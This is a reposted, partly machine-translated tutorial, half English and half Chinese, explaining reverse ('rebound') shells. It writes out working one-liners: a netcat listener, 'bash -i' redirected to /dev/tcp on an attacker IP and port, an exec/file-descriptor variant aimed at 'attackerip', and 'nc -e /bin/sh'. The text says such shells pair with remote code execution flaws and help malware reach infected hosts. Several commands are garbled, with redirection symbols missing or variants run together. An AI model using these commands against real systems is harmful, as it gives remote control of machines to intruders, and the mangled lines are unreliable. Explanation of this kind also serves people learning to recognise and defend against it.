What does rebound shell mean?

王林
Release: 2023-05-11 16:25:20
forward
6606 people have browsed it

* Solemn statement: This article is limited to technical discussion and sharing, and is strictly prohibited from being used in illegal ways.

0x00 Preface

Bounceshellmeans that the control end listens on a certainTCP/UDPport, and the controlled end initiates a request to the port port and transfer its command line input and output to the control port.

In layman's terms, reboundshellis a kind of reverse link, which is different from forwardssh. It executes commands on the other party's computer to connect to ours. attack mode, and this attack mode must be used with a remote command execution vulnerability.

Why reboundshell? It is usually used when the controlled end is restricted by firewall, lacks permissions, and the port is occupied.

Suppose we attack a machine and open a port on the machine. The attacker connects to the target machine on his own machine. This is a more conventional form. We call it a forward connection. Remote desktop,webservice,ssh,telnet, etc. are all forward connections.

So under what circumstances is the forward connection not easy to use:

1. A client has hit your network horse, but it is in the LAN, you connect directly No.

2. Itsipwill change dynamically and you cannot continuously control it.

3. Due to restrictions such as firewalls, the other machine can only send requests but cannot receive requests.

4. For viruses and Trojans, it is unknown when the victim will be infected, what the other party's network environment is like, and when to turn on and off the machine. Therefore, establish a server to allow malicious programs to actively connect. , is the best policy.

Then rebound is easy to understand. The attacker specifies the server, and the victim host actively connects to the attacker's server program, which is called reboundshell.

0x01 Rebound shell demonstration

We usebashRemote code execution vulnerability example to understand its principle

Attack end: 10.100. 40.5 Victim machine: 192.168.197.136

First we need to monitor the port on the attack end, and use this port to receive theshell
bounced by the victim machine and enter it on the attack end Commandnc -l 2333

What does rebound shell mean?

Then execute the command

bash -i >& /dev/tcp/10.100.40.5/2333 0>&1
Copy after login

What does rebound shell mean?

on the victim machine and we will We found that theshellof our victim has successfully appeared on our attack end, and we can perform the next step on the victim end on our attack end

What does rebound shell mean?

For example:

What does rebound shell mean?

0x02 Principle

2.1 Rebound shell command principle

(1)bash -i

bashis a commonshelloflinuxand is the default# for manyLinuxdistributions ##Shell.
-iThis parameter means to generate an interactiveshell

(2)

./dev/tcp/ip/port
/dev/tcp|udp/ip/portThis file is very special. In fact, it can be regarded as a device (everything underLinuxis a file), In fact, if you access the location of this file, it does not exist, as shown below:

What does rebound shell mean?

(3) But if you read this file while one party is listening on the port, By writing,

socketcommunication with the server listening on the port can be realized

We output characters to the file

/dev/tcp

Victim end :

What does rebound shell mean?

Attacking side:

What does rebound shell mean?

(4) Next we are looking at transferring the output to the victim side. The attack end continues to listen to port

2333, and if you enter the content on the attack end and press Enter, it will appear on the victim end.

What does rebound shell mean?

What does rebound shell mean?

(5) This way the idea is clearer, let’s talk about interactive redirection:

In order to achieve interaction, We need to redirect the output of the victim's interactive

shellto the attack machine;

Enter on the victim machine:

bash -i > /dev/tcp 10.100.40.5/2333
Copy after login
Then we found that no matter what command is entered, There will be no echo, and the echo appears now that the standard output of the attack side is directed to the attack side.

What does rebound shell mean?

What does rebound shell mean?

这样只是回显而已,并没有办法在攻击端直接执行命令。

(6)所以我们还需要将攻击者输入的指令输入给受害者的bash

bash -i 

这样就会做到在攻击端输入命令,回显到受害端:

What does rebound shell mean?

What does rebound shell mean?

(7)最重要的在与怎么将两个操作结合起来,实现在攻击端输入攻击端输出,我们需要将输出输入都绑定到/dev/tcp这个文件下。

命令:

bash -i > /dev/tcp/10.100.40.5/2333 0>&1
Copy after login

受害端:

What does rebound shell mean?

攻击端:

What does rebound shell mean?

我们发现完全实现了我们的需求,在攻击端执行命令,并且回显,这个命令,做到了输入0是由/dev/tcp/192.168.146.129/2333输入的,也就是攻击机的输入,命令执行的结果1,会输出到/dev/tcp/192.168.156.129/2333上,这就形成了一个回路,实现了我们远程交互式shell的功能。
我们发现还是有一个小问题,我们可以看到,虽然命令执行结果在攻击端回显,但是受害端依然是有命令回显的,
所以我们需要解决这个问题
命令 :

bash -i > /dev/tcp/10.100.40.5/2333 0>&1 2>&1
Copy after login

这样命令就不会回显到受害端了。

What does rebound shell mean?

就算是错误输出也会输出到攻击端,这样就达到了我们的目的。

What does rebound shell mean?

2.2 常见反弹shell方法

(1) 方法一

bash -i>& /dev/tcp/10.100.40.5/2333 0& /dev/tcp/10.100.40.5/2333 0

这两个几乎是一样的唯一的区别是0>&10,其实就是打开方式的不同,而对于这个文件描述符来讲并没有什么区别。

(2) 方法二

bash -i >& /dev/tcp/10.100.40.5/2333 & /dev/tcp/10.100.40.5/2333 0

(3) 方法三

exec 5/dev/tcp/192.168.146.129/2333;cat &5 2>&1;done 0/dev/tcp/attackerip/4444; sh &196 2>&196
Copy after login

(4) 方法四

nc -e /bin/sh 10.100.40.5 2333
Copy after login

The above is the detailed content of What does rebound shell mean?. For more information, please follow other related articles on the PHP Chinese website!

Related labels:
source:yisu.com
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template
About us Disclaimer Sitemap
php.cn:Public welfare online PHP training,Help PHP learners grow quickly!